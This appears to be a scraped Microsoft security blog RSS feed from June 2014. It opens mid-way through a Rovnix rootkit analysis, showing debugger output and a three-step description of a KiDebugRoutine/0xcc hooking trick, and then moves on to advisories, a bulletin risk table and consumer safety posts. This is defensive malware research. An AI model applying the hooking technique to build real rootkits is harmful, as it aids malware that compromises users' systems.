pl zr na pe nc<br />cs=0008&nbsp; ss=0010&nbsp; ds=0023&nbsp; es=0023&nbsp; fs=0030&nbsp; gs=0000&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; efl=00210246<br />80b9be24 c601cc&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; byte ptr [ecx],0CCh&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ds:0023:867bf4b1=8b</p> </blockquote> <p><br />According to the above information, the BSOD is raised when Rovnix is trying to write to address 0x867bf4b1 (ecx).</p> <p>Let&rsquo;s have a look at that address:</p> <blockquote style="margin-right:0px;" dir="ltr"> <p>kd&gt; u 867bf4b1<br />storport!RaDriverScsiIrp <br />867bf4b1 8bff&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; edi,edi<br />867bf4b3 55&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; ebp<br />867bf4b4 8bec&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; ebp,esp<br />867bf4b6 53&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; ebx<br />867bf4b7 56&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; esi<br />867bf4b8 57&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp; edi<br />867bf4b9 a100d07c86&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; eax,dword ptr [storport!WPP_GLOBAL_Control (867cd000)]<br />867bf4be 8b7d0c&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; edi,dword ptr [ebp+0Ch]</p> </blockquote> <p><br />We know Rovnix is trying to write a byte <em>0xcc</em> at address <em>storport!RaDriverScsiIrp</em>. <br />However, it didn&rsquo;t make the address writable, so it&rsquo;s causing a write to read-only memory BSOD.</p> <p><strong>The trick behind this BSOD</strong></p> <p>Why is Rovnix trying to put a <em>0xcc </em>byte at a driver dispatch function? Isn&rsquo;t that going to cause an exception?&nbsp;We recall having seen&nbsp;this trick before (used by <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Alureon">Win32/Alureon</a>) &ndash; it&rsquo;s a tricky hooking mechanism. In short, it works like this:</p> <ol> <li>The malware modifies KiDebugRoutine to point to its own debug routine.</li> <li>When the 0xcc is executed, an exception is raised, and the control is&nbsp; transferred to Rovnix&rsquo;s own debug routine.</li> <li>In Rovnix&rsquo;s own debug routine, it modifies the EIP register in the saved context to its own function (hook).</li> </ol> <p>Is that the end of the story? No, not yet.</p> <p><strong>Windows XP v.s. Windows 7</strong></p> <p>Did the malware author test the sample before releasing it? Probably yes, but perhaps only on Windows XP. We tried this sample on a Windows XP machine, and it doesn&rsquo;t crash - the <em>KiDebugRoutine </em>trick works as expected.&nbsp; This means that on Windows XP, the memory address should be writable. However, the section characteristics are read-only for both cases. So why is the address writable on Windows XP but not Windows 7?</p> <p>The answer is a bit surprising &ndash; it lies in the value of SectionAlignment in PE header.&nbsp; On Windows XP, the <em>SectionAlignment </em>for the disk driver is less than <em>0x1000</em> - whereas on Windows 7 it is <em>0x1000</em>.&nbsp; For the <em>SectionAlignment &lt; 0x1000 </em>case, Windows loads the whole PE file as a single subsection, and the whole subsection is writable regardless of the section characteristic in the section table. For the <em>SectionAlignment &gt;= 0x1000 case</em>, it is loaded section by section and each section has its own section characteristic (specified in the section table).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/BSOD2.png"> <img width="500" alt="Win XP" src="http://www.microsoft.com/security/portal/blog-images/a/BSOD2.png" border="0" /></a>&nbsp;</p> <p><em>Figure 2: SectionAlignment &lt; 0x1000 on Windows XP</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/BSOD3.png"><img alt="Win 7" src="http://www.microsoft.com/security/portal/blog-images/a/BSOD3.png" border="0" /></a>&nbsp;</p> <p><em>Figure 3: SectionAlignment =0x1000 on Windows 7</em></p> <p>That&rsquo;s the whole story of this BSOD &ndash; &ldquo;Rovnix&rsquo;s fault- so core dumped&rdquo;.</p> <p>Our <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDropper:Win32/Rovnix.K">TrojanDropper:Win32/Rovnix.K</a> description has full remediation steps to fix this issue.</p> <p>As always, the best protection from this and other threats is to run up-to-date real-time security software such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>&nbsp;and the <a href="http://www.microsoft.com/en-us/download/details.aspx?id=29851">Enhanced Mitigation Experience Toolkit</a>.</p> <p><em>Chun Feng and Jim Wang</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3633042&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> When Vulnerabilities are Exploited: the Timing of First Known Exploits for Remote Code Execution Vulnerabilitieshttp://blogs.technet.com/b/security/archive/2014/06/17/when-vulnerabilities-are-exploited-the-timing-of-first-known-exploits-for-remote-code-execution-vulnerabilities.aspxTue, 17 Jun 2014 17:02:18 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:ddee3f5a-a8b9-4fbe-8e79-66c4dc36e50eTim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3632875http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3632875http://blogs.technet.com/b/security/archive/2014/06/17/when-vulnerabilities-are-exploited-the-timing-of-first-known-exploits-for-remote-code-execution-vulnerabilities.aspx#comments<p>One of the questions I get asked from time to time is about the days of risk between the time that a vulnerability is disclosed and when we first see active exploitation of it; i.e. how long do organizations have to deploy the update before active attacks are going to happen?&nbsp; Trustworthy Computing&rsquo;s <a href="http://www.microsoft.com/security/msec.aspx">Security Science </a>team published new data that helps put the timing of exploitation into perspective, in the recently released <a href="http://www.microsoft.com/sir">Microsoft Security Intelligence Report volume 16</a>.</p> <p>The Security Science team studied exploits that emerged for the most severe vulnerabilities in Microsoft software between 2006 and 2013. The exploits studied were for vulnerabilities that enable remote code execution. The timing of the release of the first known exploit for each remote code execution vulnerability was examined and the results were put into three groups. <a href="/b/security/archive/2014/06/16/when-vulnerabilities-are-exploited-the-timing-of-first-known-exploits-for-remote-code-execution-vulnerabilities.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/17/when-vulnerabilities-are-exploited-the-timing-of-first-known-exploits-for-remote-code-execution-vulnerabilities.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3632875&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Threat IntelligenceRemote Code ExecutionVulnerabilitiesSIRv16exploitsEMET Microsoft releases Security Advisory 2974294http://blogs.technet.com/b/msrc/archive/2014/06/17/microsoft-releases-security-advisory-2974294.aspxTue, 17 Jun 2014 17:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:1d1ed694-5408-4f23-8f52-bd28ee802da1Dustin C. Childs0<p>Today, we released <a href="https://technet.microsoft.com/library/security/2974294">Security Advisory 2974294</a> to inform global customers about an update for the Microsoft Malware Protection Engine. This update addresses a privately disclosed issue and fixes a vulnerability that could allow a denial of service if the Microsoft Malware Protection Engine scans a specially crafted file.</p> <p>Updates for the Microsoft Malware Protection Engine are sent through security advisories as there is typically no action required to install the update. This is due to the fact that the built-in mechanism for the automatic detection and deployment of updates will apply the update within 48 hours of release. There&rsquo;s no action for you to take here &ndash; the engine will do it for you. The exact time frame depends on the software used, Internet connection, and infrastructure configuration.</p> <p>We appreciate the researcher reporting this to us privately via Coordinated Vulnerability Disclosure (CVD) and for allowing us to release the update before there was any impact to our global customers.</p> <p>Thank you,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632824&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Malware Protection EngineSecurity Advisory Get help with your Outlook.com questionshttp://blogs.msdn.com/b/securitytipstalk/archive/2014/06/17/get-help-with-your-outlook-questions.aspxTue, 17 Jun 2014 14:44:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10531647Eve Blakemore21http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10531647http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/17/get-help-with-your-outlook-questions.aspx#comments<p>We receive lots of comments and questions from people who are having trouble signing in to their accounts. Although we can&rsquo;t answer all of your questions individually, you might find solutions on the following pages.</p> <p><strong>Click the problem you need help with:</strong></p> <p><strong><a href="http://windows.microsoft.com/en-us/windows-live/sign-in-cant">Forgotten password and other sign-in problems</a></strong></p> <p><strong><a href="http://go.microsoft.com/fwlink/?LinkID=242804">I need to reset my password</a></strong></p> <p><strong><a href="http://go.microsoft.com/fwlink/?LinkID=320400">&ldquo;Your account has been temporarily blocked&rdquo;</a></strong></p> <p><strong><a href="http://windows.microsoft.com/en-us/windows-live/sign-in-how">How do I sign in to my Microsoft account?</a></strong></p> <p><strong><a href="http://go.microsoft.com/fwlink/?LinkID=294733">I am having problems receiving or using a security or verification code</a></strong></p> <p><strong><a href="http://windows.microsoft.com/en-us/windows-live/account-security-password-information">Why am I being asked to provide or verify my security info?</a></strong></p> <p><strong><a href="http://go.microsoft.com/fwlink/?LinkID=294734">My problem isn't listed here</a></strong></p> <p>Need help with something else? <a href="http://windows.microsoft.com/en-us/windows-live/microsoft-account-help">See the top Microsoft account solutions</a></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10531647" width="1" height="1">emailOutlook.com Nokia Unveils a New Pocket Magnifier and Accessibility Tool for Lumia Smartphones http://blogs.msdn.com/b/accessibility/archive/2014/06/17/nokia-unveils-a-new-pocket-magnifier-and-accessibility-tool-for-lumia-smartphones.aspxTue, 17 Jun 2014 13:30:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10534179Daniel Hubbell - MSFT2http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10534179http://blogs.msdn.com/b/accessibility/archive/2014/06/17/nokia-unveils-a-new-pocket-magnifier-and-accessibility-tool-for-lumia-smartphones.aspx#commentsNokia teamed up with the Royal National Institute of Blind People (RNIB) to create a magnifier for its Lumia smartphones that could be a helpful tool for vision-impaired users. The Nokia Pocket Magnifier allows a user to turn a Lumia phone into a magnifying...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/17/nokia-unveils-a-new-pocket-magnifier-and-accessibility-tool-for-lumia-smartphones.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10534179" width="1" height="1"> June 2014 Security Bulletin Webcast and Q&Ahttp://blogs.technet.com/b/msrc/archive/2014/06/13/june-2014-security-bulletin-webcast-and-q-amp-a.aspxFri, 13 Jun 2014 17:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:f0e1fe5a-e599-4348-9331-04130737730cDustin C. Childs0<p>Today we published the June 2014 Security Bulletin webcast <a href="http://blogs.technet.com/b/msrc/p/july-2014-security-bulletin-q-a.aspx">questions and answers page</a> along with the webcast replay. We answered six questions on air, with the majority focusing on the updates for <a href="https://technet.microsoft.com/library/security/ms14-031">TCP</a> and <a href="https://technet.microsoft.com/library/security/ms14-035">Internet Explorer</a>. The transcript also includes a question we did not have time to answer on the air.</p> <p>Here is the video replay:</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/FgOfDCyAIXs?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="http://www.youtube.com/v/FgOfDCyAIXs?version=3&amp;hl=en_US" type="application/x-shockwave-flash" width="500" height="281" /></object></p> <p>We invite you to join us for the next scheduled webcast on Wednesday, July 9, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the July bulletin release and answer your bulletin deployment questions live on the air. Details about registering for this event are forthcoming.</p> <p>I look forward to seeing you next month.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632807&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsBulletin WebcastSecurity Bulletin WebcastInternet Explorer (IE) High School Students and Seniors Close Digital and Generational Gaps in New Filmhttp://blogs.msdn.com/b/accessibility/archive/2014/06/12/high-school-students-and-seniors-close-digital-and-generational-gaps-in-new-film.aspxThu, 12 Jun 2014 21:26:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10534178Daniel Hubbell - MSFT2http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10534178http://blogs.msdn.com/b/accessibility/archive/2014/06/12/high-school-students-and-seniors-close-digital-and-generational-gaps-in-new-film.aspx#commentsThe following blog post was written by Paul Nyhan, a staff writer with the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues. ----- Technology can be a powerful tool for seniors...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/12/high-school-students-and-seniors-close-digital-and-generational-gaps-in-new-film.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10534178" width="1" height="1"> Who Exploits Vulnerabilities: the Path from Disclosure to Mass Market Exploitationhttp://blogs.technet.com/b/security/archive/2014/06/12/who-exploits-vulnerabilities-the-path-from-disclosure-to-mass-market-exploitation.aspxThu, 12 Jun 2014 17:47:13 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:fde84b8f-5623-4f35-878e-a383beec91e2Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3632734http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3632734http://blogs.technet.com/b/security/archive/2014/06/12/who-exploits-vulnerabilities-the-path-from-disclosure-to-mass-market-exploitation.aspx#comments<p>Vulnerabilities are weaknesses in software that enable an attacker to compromise the integrity, availability, or confidentiality of the software or the data that it processes. Some of the worst vulnerabilities allow attackers to exploit the compromised system by causing it to run malicious code without the user&rsquo;s knowledge.&nbsp; New research in the latest volume of the <a href="http://www.microsoft.com/sir"><span style="color:#0066dd;">Microsoft Security Intelligence Report, volume 16</span></a>, provides insight into the journey that remote code execution (RCE) exploits take between their first use and their eventual inclusion in criminal exploit kits that seek to attack systems on a mass scale.</p> <p>The parties that initially disclose vulnerabilities are not always the same parties that go on to develop and use exploits that take advantage of them. Vulnerability disclosures originate from a variety of sources, from dangerous disclosures (such as from malicious exploit developers and vulnerability sellers) to limited beneficial disclosures (such as the affected software vendors themselves and security researchers who are committed to coordinated vulnerability disclosure).</p> <p>To explore how exploits make their way into criminal hands, Microsoft analyzed exploits targeting the 16 RCE vulnerabilities in various software products that had known exploits discovered between January 2012 and February 2014. <a href="/b/security/archive/2014/06/12/who-exploits-vulnerabilities-the-path-from-disclosure-to-mass-market-exploitation.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/12/who-exploits-vulnerabilities-the-path-from-disclosure-to-mass-market-exploitation.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3632734&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Remote Code ExecutionVulnerabilitiesEnhanced Mitigation Experience Toolkitexpoit kitsexploitsEMET Microsoft is building a global online safety community, one tweet at a timehttp://blogs.msdn.com/b/securitytipstalk/archive/2014/06/12/microsoft-is-building-a-global-online-safety-community-one-tweet-at-a-time.aspxThu, 12 Jun 2014 13:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10533015Kim Sanchez, Director of Trustworthy Computing4http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10533015http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/12/microsoft-is-building-a-global-online-safety-community-one-tweet-at-a-time.aspx#comments<p>Some say, &ldquo;It takes a village to raise a child.&rdquo; Extending this notion, it takes an entire global community to make the Internet a safer and better place.</p> <p>Microsoft is committed to fostering digital citizenship&mdash;the safer, responsible, and more appropriate use of devices and technology. Although it&rsquo;s impossible to be all things to all people, by using digital and social media, we can more efficiently reach those interested in educating themselves, their community, and the youth in their lives, on the proactive habits and practices needed to have safer digital experiences.</p> <p>Earlier this year, Microsoft surpassed 100,000 followers on its <a href="http://www.twitter.com/safer_online">@Safer_Online</a> Twitter channel. This growth is due to the involvement and enthusiasm of our active community. From sharing our online safety news, research, and guidance, to connecting with other online safety experts and participating in our live social media events, you are what drives us to do more. Thank you for your support and engagement! &nbsp;</p> <p>We all have a role to play in helping create a safer digital world. &nbsp;What will yours be?</p> <p><iframe src="http://www.youtube.com/embed/X011KHzf73g" frameborder="0" width="640" height="390"></iframe></p> <ul> <li>Educate yourself and your social circles about the benefits of, risks to, and proactive steps to take when going online.</li> <li>Join the online safety conversation with your own tips and questions for our community.</li> <li>Participate in any of our upcoming live Twitter chats. You never know, there could be prizes to be won!</li> </ul> <p>Connect with us on all of our online channels!</p> <p><span style="font-size: small;">Web: <a href="http://www.microsoft.com/safety">Microsoft.com/Safety</a>&nbsp; Twitter:&nbsp;<a href="http://www.twitter.com/safer_online">@Safer_Online</a>&nbsp; Facebook:&nbsp;<a href="http://www.facebook.com/saferonline">SaferOnline</a>&nbsp; YouTube:&nbsp;<a href="http://www.youtube.com/MSFTOnlineSafety">MSFTOnlineSafety</a>&nbsp;&nbsp;</span>&nbsp;&nbsp;&nbsp;&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10533015" width="1" height="1"> New Guidance for Securing Public Key Infrastructurehttp://blogs.technet.com/b/security/archive/2014/06/11/new-guidance-for-securing-public-key-infrastructure.aspxWed, 11 Jun 2014 18:06:14 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:f370a068-4e27-4a20-87fa-e65a296ac2efTim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3632621http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3632621http://blogs.technet.com/b/security/archive/2014/06/11/new-guidance-for-securing-public-key-infrastructure.aspx#comments<p>Public Key Infrastructure (PKI) is used as a building block to provide key security controls, such as data protection and authentication for organizations. Many organizations operate their own PKI to support things like remote access, network authentication and securing communications.</p> <p>The threat of compromise to IT infrastructures from attacks is evolving. The motivations behind these attacks are varied, and compromising an organization&rsquo;s PKI can significantly help an attacker gain access to the sensitive data and systems they are after.</p> <p>To help enterprises design PKI and protect it from emerging threats, Microsoft IT has released a detailed technical reference document - &ldquo;<strong><a href="/controlpanel/blogs/posteditor.aspx/&lt;strong&gt;http:/aka.ms/securingpkidl&lt;/strong&gt;">Securing Public Key Infrastructure</a></strong>.&rdquo; <a href="/b/security/archive/2014/06/11/new-guidance-for-securing-public-key-infrastructure.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/11/new-guidance-for-securing-public-key-infrastructure.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3632621&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">msitEnterprise SecurityPKIPublic Key Infrastructure Assessing risk for the June 2014 security updates http://blogs.technet.com/b/srd/archive/2014/06/10/assessing-risk-for-the-june-2014-security-updates.aspxTue, 10 Jun 2014 18:04:38 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8167a6e5-da63-4864-8eee-b0d4f9e10240swiat0<p></p> <p><span style="font-family:arial,helvetica,sans-serif;font-size:medium;"><span style="font-size:small;">Today we released seven security bulletins addressing 66 unique CVE&rsquo;s.&nbsp; Two bulletins have a maximum severity rating of Critical while the other five have a maximum severity rating of Important. This table is designed to help you prioritize the deployment of updates appropriately for your environment</span><span><span style="font-size:small;">.</span><br /><br /></span></span></p> <table border="1"> <tbody> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Bulletin&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Most likely attack vector</strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Max Bulletin Severity</strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Max XI</strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Likely first 30 days impact</strong></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><strong>Platform mitigations and key notes</strong></span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-035.aspx">MS14-035</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(Internet Explorer)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim browses to a malicious webpage.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Critical</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">1</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Likely to see reliable exploits developed within next 30 days.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">CVE count (59) is result of focusing on in-the-wild exploits last month. These are the May + June fixes for issues not under active attack.</span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-034.aspx">MS14-034</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(Word 2007)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim opens malicious Office document. </span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">1</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Likely to see reliable exploits developed within next 30 days.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Issue addressed in embedded font parsing. Reachable via either doc or docx.&nbsp; Word 2010 and later not affected.</span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-036.aspx">MS14-036</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(GDI+)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim open malicious graphics file or malicious PowerPoint document</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Critical</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">1</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Likely to see reliable exploits developed within next 30 days.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Issue addressed is in EMF+ record type parsing, an area we have not seen real-world attackers pursue recently.&nbsp; (Hence, table lists Word security update ahead of GDI+ update.)</span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-033.aspx">MS14-033</a><br /><br /></span>(<span style="font-family:arial,helvetica,sans-serif;font-size:small;">MSXML)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim browses to a malicious webpage or opens a malicious document, inadvertently sending local path name of downloaded file to attacker.&nbsp; Path name by default includes the user&rsquo;s login name.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">3</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Less likely to see widespread usage of information disclosure vulnerabilities.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Information disclosure only.</span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-030.aspx">MS14-030</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(Terminal Services)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Attacker acting as man-in-the-middle at the start of a Remote Desktop session may be able to read information from or tamper with RDP session.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">n/a</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Less likely to see widespread usage of vulnerabilities enabling tampering.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Terminal Services NLA feature mitigates this vulnerability.</span></td> </tr> <tr> <td><br /><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-031.aspx">MS14-031</a><br /><br /></span>(<span style="font-family:arial,helvetica,sans-serif;font-size:small;">TCP)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><span style="color:#333333;line-height:115%;">Attacker initiates large number of connections with malformed TCP options.&nbsp; Each connection temporarily consumes non-paged pool memory longer than it should, leading to resource exhaustion.</span></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">3</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><span style="color:#333333;line-height:115%;">Less likely to see widespread usage of vulnerability allowing resource exhaustion denial-of-service only.</span></span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><span style="color:#333333;line-height:115%;">Attacker must control TCP Options fields.&nbsp; Attacker would be unable to cause denial-of-service for systems behind network infrastructure that overwrites the TCP Options field.</span></span></td> </tr> <tr> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;"><a href="http://technet.microsoft.com/en-us/library/security/MS14-032.aspx">MS14-032</a><br /><br /></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;"></span><span style="font-family:arial,helvetica,sans-serif;font-size:small;">(Lync Server XSS)</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Victim clicks on a specially-crafted malicious link to an established Lync meeting.&nbsp; Attacker can take action in context of Lync Server service that victim would normally have access to take. </span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Important</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">3</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">Less likely to see widespread usage of this vulnerability.</span></td> <td><span style="font-family:arial,helvetica,sans-serif;font-size:small;">XSS style vulnerability.</span></td> </tr> </tbody> </table> <p><span style="font-family:arial,helvetica,sans-serif;font-size:medium;"><span>&nbsp;</span></span></p> <p></p> <p>- Jonathan Ness, MSRC engineering team</p> <p><span style="font-family:arial,helvetica,sans-serif;font-size:medium;"><span>&nbsp;</span></span></p> <p><span style="font-family:arial,helvetica,sans-serif;font-size:medium;"><span>&nbsp;</span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632531&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">MitigationsAttack VectorRisk Asessment Get security updates for June 2014http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/10/get-security-updates-for-june-2014.aspxTue, 10 Jun 2014 17:26:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10531646Eve Blakemore14http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10531646http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/10/get-security-updates-for-june-2014.aspx#comments<p>Microsoft releases security updates on the second Tuesday of every month.</p> <p><strong><a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">Skip the details and check for&nbsp;the latest updates.</a></strong></p> <p>This bulletin announces the release of security updates for&nbsp;Windows, Microsoft Office, and other programs.<strong><br /></strong></p> <ul> <li><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn how to get security updates automatically</a></li> <li><a href="http://technet.microsoft.com/en-us/security/bulletin/ms14-jun">For IT Pros: Microsoft Security Bulletin Summary for June 2014</a></li> </ul> <p>To get more information about security updates and other privacy and security issues delivered to your email inbox,&nbsp;<a href="http://www.microsoft.com/security/resources/newsletter.aspx">sign up for our newsletter</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10531646" width="1" height="1">security updatesautomatic updatingAutomatic UpdatesMicrosoft OfficesecurityMicrosoft UpdateWindows UpdateMicrosoft Security Bulletin Summary for June 2014 Theoretical Thinking and the June 